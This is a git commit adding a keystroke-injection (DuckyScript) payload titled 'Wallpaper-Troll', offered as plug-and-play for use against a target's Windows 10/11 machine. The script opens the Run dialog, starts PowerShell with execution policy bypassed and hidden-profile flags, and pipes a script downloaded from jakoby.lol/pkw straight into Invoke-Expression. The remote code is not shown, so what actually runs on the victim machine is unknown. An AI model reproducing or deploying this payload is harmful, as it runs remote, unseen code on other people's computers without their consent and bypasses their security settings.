Create Wallpaper-URL.txt

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:22:01 -06:00 committed by GitHub
parent e05ae050f3
commit cbdd2f62fb
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,16 @@
REM Title: Wallpaper-Troll
REM
REM Author: I am Jakoby
REM
REM Description: This payload will change your targets wallpaper to an image from a provided url
REM Target: Windows 10, 11
REM
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
REM
GUI r
DELAY 500
STRING powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
DELAY 500
ENTER